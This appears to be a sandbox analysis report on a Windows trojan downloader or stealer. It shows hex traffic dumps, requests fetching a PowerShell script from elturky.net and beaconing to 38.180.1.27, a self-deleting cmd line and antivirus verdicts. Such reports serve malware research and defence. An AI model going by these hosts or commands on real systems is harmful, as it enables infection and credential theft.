0x8d, 0xdb, 0x7f, 0xb5, 0xe3, 0x8c, 0x70, 0xa9, 0xa1, 0xc3, 0xd1, 0x1f, 0x88, 0x56, 0x41, 0x1d, 0xa2, 0x29, 0x3e, 0xbf, 0xfa, 0x33, 0x69, 0xfb, 0xb6, 0x6e, 0xe4, 0xf7, 0x93, 0x56, 0x32, 0x6c, 0xcf, 0x68, 0x9e, 0x7f, 0xe2, 0x4d, 0x45, 0x85, 0xf2, 0x3a, 0x19, 0xb5, 0x2a, 0x3b, 0x6b, 0x56, 0x68, 0x8b, 0xce, 0x86, 0x58, 0xde, 0x6a, 0x42, 0xab, 0xf5, 0xf5, 0x37, 0x55, 0x0d, 0x9d, 0xb7, 0xa4, 0x5d, 0xe2, 0xad, 0xec, 0xcb, 0x26, 0x5d, 0x60, 0x23, 0x02, 0xcd, 0x63, 0x55, 0x6d, 0x40, 0x03, 0x3b, 0x73, 0xb4, 0xce, 0x6e, 0xc2, 0xed, 0x4d, 0x17, 0xef, 0xc9, 0xf0, 0x15, 0xfd, 0xa2, 0x24, 0xf6, 0x32, 0x50, 0x1a, 0xca, 0xc6, 0x56, 0x8e, 0x4f, 0xe2, 0x11, 0x58, 0x2d, 0x69, 0xde, 0xa0, 0xce, 0x77, 0xd1, 0x53, 0xa9, 0xd6, 0x21, 0xdb, 0x83, 0xa8, 0xdf, 0xce, 0x61, 0x4d, 0x96, 0x2c, 0x07, 0x86, 0xc8, 0x27, 0x72, 0xcd, 0x5f, 0xa1, 0xf9, 0x53, 0xac, 0x68, 0x99, 0xc4, 0x9d, 0x8f, 0xa
Data received x01, 0xc3, 0xd4, 0x3d, 0xfe, 0xd3, 0x2b, 0x34, 0xec, 0x9e, 0xcf, 0xbc, 0xda, 0xff, 0x68, 0xc1, 0x59, 0xc5, 0xe1, 0xc6, 0x47, 0x34, 0xae, 0x65, 0x04, 0x18, 0x3d, 0xe1, 0x28, 0x70, 0x85, 0x49, 0x49, 0xd8, 0xeb, 0x6f, 0x42, 0x09, 0x2e, 0xca, 0x1b, 0x3b, 0x71, 0x59, 0x6e, 0x68, 0x46, 0x40, 0x49, 0x1f, 0x1b, 0xa3, 0xd3, 0x59, 0x62, 0x51, 0x2e, 0x9f, 0x3a, 0x5d, 0xbd, 0x23, 0xe0, 0x72, 0x69, 0x18, 0x72, 0x39, 0x55, 0xe9, 0x09, 0x33, 0xa0, 0xa1, 0x3a, 0x22, 0x10, 0xe1, 0xb4, 0xf6, 0xfc, 0xa3, 0x03, 0x38, 0xfe, 0x53, 0xc3, 0x2c, 0xa6, 0xac, 0xcd, 0xc7, 0x0f, 0x46, 0xe8, 0x7f, 0xff, 0x5e, 0x26, 0x9f, 0x16, 0x3f, 0x7c, 0x14, 0x3b, 0xff, 0x18, 0x75, 0x13, 0x5e, 0xe6, 0x66, 0xde, 0x9b, 0x4c, 0x41, 0x14, 0x14, 0x20, 0x5f, 0x37, 0xd3, 0x5e, 0x11, 0x62, 0x02, 0x03, 0x2b, 0x1e, 0xb6, 0x16, 0xaa, 0xaa, 0x4d, 0xdc, 0xa4, 0x9d, 0xd1, 0x2b, 0xdc, 0xd2, 0x6a, 0x61, 0x41, 0x02, 0xeb, 0xb3, 0x51, 0xf8, 0xd8, 0xab, 0x65, 0xf6, 0x2f, 0x7d, 0xdc, 0x6e, 0x8f, 0x43, 0x01, 0xf4, 0x86, 0x16, 0x4b, 0x65, 0x69, 0xc5, 0xe9, 0x34, 0xda, 0xa2, 0x8c, 0xc9, 0xbf, 0xdc, 0x3c, 0x76, 0xa9, 0x76, 0xc7, 0xcf, 0xd7, 0x6b, 0xf2, 0xcb, 0x0f, 0x5c, 0xdd, 0xde, 0xa2, 0x31, 0x20, 0xac, 0x87, 0x9f, 0xe1, 0x7d, 0x78, 0x80, 0x05, 0x8b, 0x86, 0x71, 0xdb, 0x43, 0x4f, 0xe7, 0x6a, 0xa3, 0xda, 0xf3, 0x9d, 0xbc, 0xba, 0x5e, 0x80, 0xf7, 0xbe, 0xe9, 0x07, 0xf6, 0xf1, 0x50, 0xb4, 0xa7, 0xb3, 0xf8, 0x5a, 0x56, 0xeb, 0x3a, 0xd6, 0xa8, 0x70, 0xf7, 0xdd, 0x87, 0xd4, 0x73, 0xbd, 0x49, 0xf9, 0x14, 0xe8, 0xb9, 0xa3, 0xc3, 0x71, 0x2e, 0x13, 0x52, 0xf1, 0x6b, 0xcd, 0xef, 0x89, 0x9a, 0xb2, 0xfb, 0xe6, 0xb5, 0x8f, 0x6a, 0x02, 0x69, 0x77, 0x0e, 0x32, 0xca, 0xb9, 0xf5, 0x26, 0xa5, 0x72, 0x97, 0x0d, 0x46, 0x01, 0x56, 0xd6, 0xb5, 0x3e, 0xa8, 0xbe, 0xd7, 0xca, 0xe9, 0xfe, 0x64, 0x72, 0x37, 0xf4, 0x1a, 0x0d, 0x9f, 0xa6, 0xaf, 0x90, 0x41, 0xf8, 0x6d, 0x88, 0x25, 0x42, 0xf2, 0x4d, 0xac, 0xaa, 0x2f, 0xcc, 0xe9, 0x77, 0x99, 0x6e, 0x86, 0x1d, 0x15, 0xc4, 0x86, 0x7b, 0x7b, 0x42, 0xdb, 0x5c, 0x1d, 0xd3, 0xd0, 0xc1, 0xe0, 0xdc, 0x0b, 
0x15, 0xff, 0x61, 0xc6, 0xee, 0x03, 0x7b, 0x5e, 0xe4, 0xa5, 0xf6, 0x48, 0xe2, 0x34, 0x33, 0x25, 0xf4, 0xa4, 0x32, 0x82, 0xe4, 0x70, 0xb9, 0x76, 0x73, 0x8a, 0x0f, 0xcf, 0x4d, 0xaf, 0x33, 0x95, 0xa8, 0xd8, 0xd2, 0x87, 0x2e, 0x34, 0xe2, 0xcc, 0x6c, 0x01, 0x72, 0x1d, 0x6f, 0xec, 0x1c, 0x34, 0x95, 0x1d, 0x9e, 0x4a, 0x87, 0x16, 0x76, 0x90, 0x0b, 0xaa, 0xfe, 0xcb, 0x0a, 0x95, 0xd4, 0xd0, 0x18, 0x0e, 0xd5, 0x1f, 0x0a, 0xca, 0xed, 0x0b, 0x48, 0x9e, 0x6e, 0xc4, 0xb3, 0x85, 0x60, 0x9e, 0x3d, 0x15, 0xc6, 0xfc, 0x91, 0x9f, 0x9c, 0x50, 0x8d, 0x50, 0xbb, 0xd0, 0x7b, 0x96, 0xec, 0x1c, 0x17, 0x91, 0xbf, 0x99, 0x8c, 0x27, 0x46, 0x39, 0xd7, 0x65, 0x8d, 0xf8, 0x31, 0x1d, 0x70, 0x91, 0xed, 0xf5, 0x8b, 0xc7, 0xd7, 0xa8, 0xab, 0x9e, 0xe3, 0x8a, 0x0c, 0x06, 0x77, 0xde, 0x9e, 0x42, 0x78, 0x17, 0x92, 0x97, 0xf3, 0xf3, 0xaf, 0x65, 0x46, 0xc3, 0x9a, 0x59, 0xf2, 0x18, 0x2c, 0xbd, 0x12, 0
Data received x4b, 0x5b, 0x5f, 0x77, 0x5e, 0x09, 0x5b, 0x6e, 0x59, 0x7d, 0x40, 0x50, 0x49, 0x36, 0x25, 0x6d, 0x2c, 0x9c, 0x5b, 0x75, 0x46, 0x4f, 0x37, 0x7a, 0x48, 0x63, 0x4c, 0x6d, 0x2c, 0x52, 0x53, 0x56, 0x5c, 0x29, 0x56, 0xe4, 0x6e, 0x48, 0x59, 0x77, 0x44, 0x36, 0x58, 0x73, 0x48, 0x67, 0x60, 0x6c, 0x57, 0x79, 0x55, 0x70, 0x4a, 0x33, 0x1c, 0x5a, 0x6d, 0x48, 0x5f, 0x77, 0x3d, 0x5d, 0x4c, 0x73, 0x4c, 0x61, 0x33, 0x7f, 0x57, 0x79, 0x57, 0x40, 0x4e, 0x5c, 0x15, 0x6b, 0x6d, 0x4e, 0x4a, 0x72, 0x44, 0x36, 0x5d, 0x73, 0x48, 0x67, 0x59, 0x6c, 0x38, 0x54, 0x53, 0x56, 0x5e, 0x22, 0x31, 0x7c, 0x07, 0x10, 0x4a, 0x70, 0x7e, 0xcd, 0x4e, 0x73, 0x48, 0x72, 0x4d, 0x06, 0x55, 0x02, 0x49, 0x56, 0x58, 0x37, 0x6b, 0x78, 0x65, 0x4a, 0x22, 0x7c, 0x46, 0x4d, 0x48, 0x75, 0x33, 0x48, 0x48, 0x6b, 0x53, 0x63, 0x31, 0x47, 0x50, 0x6b, 0xbb, 0x68, 0x6d, 0x48, 0x5b, 0x77, 0x3d, 0x59, 0x4c, 0x73, 0x4c, 0x4b, 0x4f, 0x6b, 0x57, 0x7f, 0x7e, 0x23, 0x5a, 0x48, 0x25, 0x6b, 0x6d, 0x4c, 0x4f, 0x1a, 0x68, 0x4d, 0x4c, 0x75, 0x5b, 0x69, 0x5a, 0x6b, 0x7f, 0x4c, 0x53, 0x56, 0x5e, 0x1e, 0x12, 0x69, 0x16, 0x58, 0x59, 0x75, 0x42, 0x4f, 0x37, 0x67, 0x48, 0x63, 0x4c, 0x7a, 0x52, 0x14, 0x42, 0x5c, 0x5a, 0x48, 0x25, 0x6b, 0x6d, 0x4c, 0x5e, 0x1a, 0x68, 0x4d, 0x4c, 0x75, 0x27, 0x41, 0x48, 0x6b, 0x51, 0x6a, 0x5a, 0x7d, 0x40, 0x31, 0x4f, 0x7b, 0x6d, 0x48, 0x5d, 0x77, 0x3d, 0x59, 0x4c, 0x73, 0x4c, 0x72, 0x4d, 0x06, 0x46, 0x73, 0x3c, 0x77, 0x58, 0x33, 0x32, 0x78, 0x64, 0x4a, 0x22, 0x64, 0x46, 0x4d, 0x48, 0x62, 0x41, 0x0c, 0x65, 0x6b, 0x57, 0x7f, 0x41, 0x56, 0x70, 0x02, 0x34, 0x6b, 0x6b, 0x59, 0x5c, 0x62, 0x2c, 0x15, 0x5f, 0x76, 0x70, 0xbf, 0x49, 0x6b, 0x57, 0x7b, 0x28, 0x5d, 0x58, 0x33, 0x30, 0x6d, 0x16, 0x63, 0x59, 0x75, 0x42, 0xc2, 0x4f, 0x73, 0x48, 0x61, 0x4a, 0x10, 0x43, 0x79, 0x53, 0x52, 0x70, 0x34, 0x34, 0x6b, 0x6b, 0x5f, 0x19, 0x97, 0x46, 0x4d, 0x4c, 0x71, 0x33, 0x6f, 0x48, 0x6b, 0x53, 0x7f, 0x28, 0x7d, 0x58, 0x33, 0x30, 0xe4, 0x6e, 0x48, 0x59, 0x77, 0x44, 0x36, 0x58, 0x73, 0x48, 0x67, 0x60, 0x6c, 0x57, 0x79, 0x55, 
0x7b, 0x15, 0x31, 0x4f, 0x61, 0x6d, 0x48, 0x5d, 0x73, 0x3d, 0x66, 0x4c, 0x73, 0x4c, 0x79, 0x2a, 0x7a, 0x5f, 0x21, 0xdc, 0x55, 0x58, 0x33, 0x36, 0x69, 0x16, 0x5c, 0x59, 0x75, 0x42, 0x65, 0x4b, 0x73, 0x48, 0x65, 0x65, 0x15, 0x45, 0x79, 0x7b, 0x62, 0x58, 0x33, 0x32, 0x69, 0x16, 0x59, 0x59, 0x75, 0x42, 0x4f, 0x37, 0x62, 0x48, 0x63, 0x4c, 0x6c, 0x38, 0x57, 0x53, 0x56, 0x5e, 0x5c, 0x19, 0x6b, 0x6d, 0x4e, 0x48, 0x70, 0x51, 0x27, 0x14, 0x60, 0x4d, 0x5b, 0x07, 0x6a, 0x57, 0x79, 0x51, 0x2d, 0x55, 0x33, 0x34, 0x6f, 0x6b, 0x33, 0x72, 0x75, 0x46, 0x49, 0xc3, 0x70, 0x48, 0x63, 0x4a, 0x69, 0x2c, 0x6d, 0x53, 0x56, 0x5c, 0x1b, 0x33, 0x6b, 0x6d, 0x4e, 0x74, 0x70, 0x4e, 0x5e, 0x40, 0x58, 0x64, 0x61, 0x33, 0x65, 0x57, 0x79, 0x57, 0x50, 0x23, 0x18, 0x34, 0x6b, 0x69, 0xc7, 0x5a, 0x75, 0x46, 0x4f, 0x4e, 0x08, 0x5c, 0x63, 0x48, 0x6f, 0x7f, 0x7e, 0x53, 0x56, 0x5e, 0x1e, 0x31, 0x62, 0x7
Data received x39, 0x25, 0x16, 0x3b, 0x63, 0x1b, 0x0e, 0x23, 0x29, 0x3c, 0x25, 0x1a, 0x5a, 0x40, 0x18, 0x3d, 0x3a, 0x36, 0x05, 0x23, 0x3f, 0x38, 0x1a, 0x2d, 0x10, 0x48, 0x38, 0x32, 0x0d, 0x17, 0x33, 0x3b, 0x5c, 0x50, 0x0e, 0x1f, 0x18, 0x2b, 0x1a, 0x36, 0x28, 0x3e, 0x07, 0x21, 0x06, 0x3b, 0x6b, 0x10, 0x1c, 0x27, 0x1a, 0x3d, 0x5d, 0x60, 0x04, 0x3d, 0x27, 0x2a, 0x26, 0x32, 0x2c, 0x38, 0x16, 0x48, 0x2f, 0x2d, 0x05, 0x13, 0x1c, 0x30, 0x39, 0x3c, 0x56, 0x46, 0x6b, 0x00, 0x17, 0x15, 0x1a, 0x31, 0x0e, 0x23, 0x17, 0x2d, 0x11, 0x48, 0x06, 0x08, 0x34, 0x3a, 0x32, 0x1b, 0x5c, 0x50, 0x0e, 0x1f, 0x48, 0x34, 0x2a, 0x05, 0x25, 0x23, 0x1a, 0x2b, 0x06, 0x48, 0x06, 0x08, 0x3a, 0x3b, 0x39, 0x31, 0x50, 0x51, 0x59, 0x6d, 0x25, 0x06, 0x3d, 0x2f, 0x2a, 0x24, 0x30, 0x27, 0x07, 0x2d, 0x19, 0x57, 0x14, 0x0c, 0x18, 0x2d, 0x5e, 0x64, 0x04, 0x1e, 0x1b, 0x2d, 0x14, 0x32, 0x28, 0x3f, 0x73, 0x0b, 0x11, 0x2d, 0x0a, 0x23, 0x1c, 0x53, 0x1a, 0x31, 0x47, 0x51, 0x19, 0x0c, 0x24, 0x1d, 0x10, 0x25, 0x22, 0x28, 0x16, 0x3a, 0x63, 0x25, 0x34, 0x14, 0x16, 0x37, 0x33, 0x2a, 0x40, 0x34, 0x06, 0x32, 0x06, 0x2c, 0x18, 0x16, 0x22, 0x3f, 0x31, 0x21, 0x17, 0x3b, 0x6b, 0x3a, 0x26, 0x1d, 0x23, 0x35, 0x63, 0x46, 0x0e, 0x1b, 0x0a, 0x30, 0x01, 0x35, 0x4d, 0x21, 0x2c, 0x18, 0x0c, 0x3b, 0x26, 0x36, 0x0a, 0x38, 0x56, 0x1f, 0x56, 0x40, 0x38, 0x19, 0x29, 0x2d, 0x10, 0x46, 0x09, 0x29, 0x10, 0x27, 0x07, 0x2d, 0x25, 0x38, 0x0b, 0x3e, 0x37, 0x34, 0x33, 0x70, 0x0e, 0x0e, 0x27, 0x3d, 0x10, 0x11, 0x24, 0x38, 0x1b, 0x05, 0x02, 0x3c, 0x08, 0x3f, 0x3b, 0x2a, 0x22, 0x3d, 0x33, 0x70, 0x0e, 0x0e, 0x27, 0x3d, 0x10, 0x34, 0x7f, 0x4c, 0x1e, 0x17, 0x27, 0x2d, 0x08, 0x38, 0x1d, 0x36, 0x24, 0x2b, 0x33, 0x7b, 0x1e, 0x19, 0x1f, 0x30, 0x1b, 0x22, 0x22, 0x3b, 0x73, 0x17, 0x01, 0x3d, 0x0d, 0x31, 0x1c, 0x21, 0x56, 0x07, 0x43, 0x5b, 0x18, 0x6d, 0x17, 0x2a, 0x01, 0x34, 0x28, 0x2d, 0x1e, 0x48, 0x3c, 0x3b, 0x1f, 0x25, 0x1c, 0x32, 0x3b, 0x08, 0x5c, 0x47, 0x6b, 0x32, 0x3f, 0x30, 0x1b, 0x22, 0x22, 0x3b, 0x20, 0x21, 0x19, 0x2d, 0x6b, 0x11, 0x15, 0x26, 0x25, 
0x30, 0x33, 0x77, 0x04, 0x1d, 0x31, 0x1b, 0x19, 0x29, 0x2e, 0x27, 0x73, 0x18, 0x16, 0x3c, 0x29, 0x2e, 0x0d, 0x36, 0x56, 0x1f, 0x56, 0x40, 0x29, 0x14, 0x3c, 0x3c, 0x75, 0x15, 0x39, 0x2d, 0x07, 0x2d, 0x63, 0x01, 0x05, 0x33, 0x1c, 0x2b, 0x56, 0x0d, 0x43, 0x50, 0x0a, 0x19, 0x2d, 0x1a, 0x1d, 0x27, 0x3f, 0x4c, 0x26, 0x38, 0x07, 0x29, 0x1f, 0x32, 0x34, 0x32, 0x22, 0x3b, 0x5b, 0x34, 0x3e, 0x1d, 0x2c, 0x38, 0x01, 0x23, 0x1f, 0x29, 0x03, 0x48, 0x36, 0x38, 0x0f, 0x36, 0x0d, 0x36, 0x05, 0x30, 0x5c, 0x46, 0x1f, 0x3f, 0x2d, 0x29, 0x75, 0x0f, 0x3e, 0x0f, 0x1b, 0x29, 0x11, 0x1b, 0x1f, 0x36, 0x0d, 0x36, 0x56, 0x1b, 0x5c, 0x5a, 0x0d, 0x18, 0x3b, 0x3c, 0x11, 0x04, 0x34, 0x0d, 0x07, 0x3c, 0x11, 0x21, 0x09, 0x22, 0x0d, 0x36, 0x56, 0x19, 0x47, 0x40, 0x19, 0x04, 0x2a, 0x2c, 0x01, 0x23, 0x4d, 0x0f, 0x06, 0x3a, 0x15, 0x2d, 0x59, 0x62, 0x4c, 0x62, 0x6f, 0x58, 0x47, 0x59, 0x6b, 0x19, 0
Data received HTTP/1.1 200 OK Server: nginx Date: Fri, 28 Jul 2023 08:35:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 56 mHYuFMLsHcHkWySVX34k|HnTgSX1R|http://38.180.1.27/index.php|https://iplogger.com/12GBH4 0
Data sent GET /ERP/public/js/debug2.ps1 HTTP/1.1 Host: elturky.net Connection: Keep-Alive
Data sent GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R HTTP/1.1 Host: 38.180.1.27 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline ping 127.0.0.1
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
host 38.180.1.27
Time & API Arguments Status Return Repeated

send

buffer: GET /ERP/public/js/debug2.ps1 HTTP/1.1 Host: elturky.net Connection: Keep-Alive
socket: 1256
sent: 85
1 85 0

send

buffer: GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R HTTP/1.1 Host: 38.180.1.27 Connection: Keep-Alive
socket: 896
sent: 125
1 125 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Convagent.4!c
Elastic malicious (high confidence)
DrWeb Trojan.DownLoader45.58708
MicroWorld-eScan Trojan.GenericKD.67478048
FireEye Generic.mg.8bdd901591eb9045
McAfee GenericRXAK-VM!8BDD901591EB
Malwarebytes Trojan.Downloader
Zillya Trojan.Coins.Win32.8032
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanPSW:Win32/Coins.feb1fed3
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D405A220
BitDefenderTheta Gen:NN.ZexaF.36318.EC0@aOVrhZmi
Cyren W32/ABRisk.EDDT-2860
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Win32/TrojanDownloader.Agent.GYX
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky HEUR:Trojan-PSW.Win32.Coins.gen
BitDefender Trojan.GenericKD.67478048
SUPERAntiSpyware Trojan.Agent/Gen-SelfDel
Avast Win32:CrypterX-gen [Trj]
Tencent Malware.Win32.Gencirc.13d0710f
Emsisoft Trojan.GenericKD.67478048 (B)
F-Secure Adware.ADWARE/HPDefender.jqeti
VIPRE Trojan.GenericKD.67478048
TrendMicro Trojan.Win32.LGOOGLOADER.YXDFLZ
McAfee-GW-Edition BehavesLike.Win32.Generic.gc
Trapmine malicious.high.ml.score
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Avira ADWARE/HPDefender.jqeti
Antiy-AVL Trojan[PSW]/Win32.Coins
Gridinsoft Ransom.Win32.Sabsik.cl
Microsoft Trojan:Win32/Redline!ic
ZoneAlarm HEUR:Trojan-PSW.Win32.Coins.gen
GData Trojan.GenericKD.67478048
Google Detected
AhnLab-V3 Trojan/Win.VM.R586385
Acronis suspicious
VBA32 BScope.TrojanPSW.Coins
ALYac Trojan.GenericKD.67478048
MAX malware (ai score=100)
Cylance unsafe
Panda Trj/Chgt.AD
TrendMicro-HouseCall Trojan.Win32.LGOOGLOADER.YXDFLZ
Rising Dropper.Convagent!8.123ED (TFE:5:Bq2aQZTefJR)